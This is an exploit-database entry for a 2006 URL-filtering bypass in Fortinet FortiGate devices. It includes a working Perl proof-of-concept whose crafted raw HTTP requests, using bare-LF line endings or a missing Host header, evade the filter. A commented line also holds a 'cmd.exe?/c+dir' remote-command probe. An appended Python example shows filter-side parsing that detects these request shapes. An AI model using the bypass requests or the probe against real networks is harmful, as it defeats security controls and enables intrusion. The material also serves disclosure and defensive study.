Fortinet Fortigate 2.x/3.0 - URL Filtering Bypass

13 Feb 2006 00:00:00 | Reported by Mathieu Dessus | Type: exploitdb | Source: www.exploit-db.com

Related

Reporter | Title | Published | Family
Packet Storm | Fortinet-url.txt | 14 Feb 2006 00:00 | packetstorm
securityvulns | [Full-disclosure] URL filter bypass in Fortinet | 13 Feb 2006 00:00 | securityvulns
Cvelist | CVE-2005-3058 | 14 Feb 2006 19:00 | cvelist
Cvelist | CVE-2008-7161 | 4 Sep 2009 10:00 | cvelist
NVD | CVE-2005-3058 | 31 Dec 2005 05:00 | nvd
NVD | CVE-2008-7161 | 4 Sep 2009 10:30 | nvd
CVE | CVE-2005-3058 | 14 Feb 2006 19:00 | cve
CVE | CVE-2008-7161 | 4 Sep 2009 10:30 | cve
Prion | Hardcoded credentials | 4 Sep 2009 10:30 | prion

source: https://www.securityfocus.com/bid/16599/info

Fortinet FortiGate is prone to a vulnerability that could allow users to bypass the device's URL filtering.

FortiGate devices running FortiOS v2.8MR10 and v3beta are vulnerable to this issue. Other versions may also be affected.

# http_req.pl
#
# Made by (Mathieu Dessus)
#
# Make a filter for /test* URL in the Fortigate and
# remove the # depending on which HTTP request you want to test
# (only the last uncommented $data assignment is sent)

use IO::Socket;

$target = '1.2.3.4';

# Detected
$data = "GET /test HTTP/1.1\r
Host: $target\r
Pragma: no-cache\r
Accept: */*\r
\r
";
# Not detected (lines end with a bare LF instead of CRLF)
$data = "GET /test2 HTTP/1.1
Host: $target
Pragma: no-cache
Accept: */*

";

# Not detected (HTTP/1.0 request with no Host header)
$data = "GET /test3 HTTP/1.0\r\n\r\n";
# Detected
#$data = "GET /test4 HTTP/1.0\r\nHost: $target\r\n\r\n";
# Detected :)
#$data = "GET //c/winnt/system32/cmd.exe?/c+dir HTTP/1.0\n\n";


my $sock = IO::Socket::INET->new(
    PeerAddr => $target,
    PeerPort => '80',
    Proto    => 'tcp',
);
die "Could not create socket: $!\n" unless $sock;
print $sock $data;
read($sock, $ret, 600);
print($ret."\n");
close($sock);
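
As an added example (not part of the original advisory or the author's script), the check below shows filter-side parsing that applies the same /test* rule to the LF-only and Host-less request shapes the script marks "Not detected". The function name, the rule constant and the sample requests are assumptions constructed for illustration.

```python
import re

BLOCKED_PREFIX = "/test"  # assumed rule, mirroring the "/test*" filter in the script

def inspect_request(raw: bytes) -> dict:
    """Apply the URL rule after parsing as leniently as a typical web server."""
    end = re.search(rb"\r?\n\r?\n", raw)          # header block ends at first empty line
    head = raw[: end.end()] if end else raw
    anomalies = []
    # Bare LF terminators are accepted by most servers, so they must not
    # make the request invisible to the filter.
    if re.search(rb"(?<!\r)\n", head):
        anomalies.append("bare-lf-line-ending")
    lines = [ln for ln in re.split(rb"\r?\n", head) if ln]
    parts = lines[0].split() if lines else []
    if len(parts) != 3:
        # Fail closed on anything that is not "METHOD target VERSION".
        return {"path": None, "blocked": True,
                "anomalies": anomalies + ["malformed-request-line"]}
    target = parts[1].decode("latin-1")
    headers = {ln.split(b":", 1)[0].strip().lower()
               for ln in lines[1:] if b":" in ln}
    # The rule is keyed on the path alone, so a missing Host header
    # (legal in HTTP/1.0) cannot skip the check.
    if b"host" not in headers:
        anomalies.append("missing-host-header")
    path = target.split("?", 1)[0]
    return {"path": path, "blocked": path.startswith(BLOCKED_PREFIX),
            "anomalies": anomalies}

# Constructed samples shaped like the requests in the script (host is a placeholder).
SAMPLES = {
    "crlf_with_host": b"GET /test HTTP/1.1\r\nHost: filter.example\r\nAccept: */*\r\n\r\n",
    "lf_only": b"GET /test2 HTTP/1.1\nHost: filter.example\nAccept: */*\n\n",
    "http10_no_host": b"GET /test3 HTTP/1.0\r\n\r\n",
    "allowed": b"GET /index.html HTTP/1.1\r\nHost: filter.example\r\n\r\n",
}

if __name__ == "__main__":
    for name, raw in SAMPLES.items():
        print(name, inspect_request(raw))
```

The anomaly labels are useful as log fields: a request that is both on the block list and carries one of them matches the request shapes exercised by the script above.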

Vulners AI Score: 7.4 (High risk)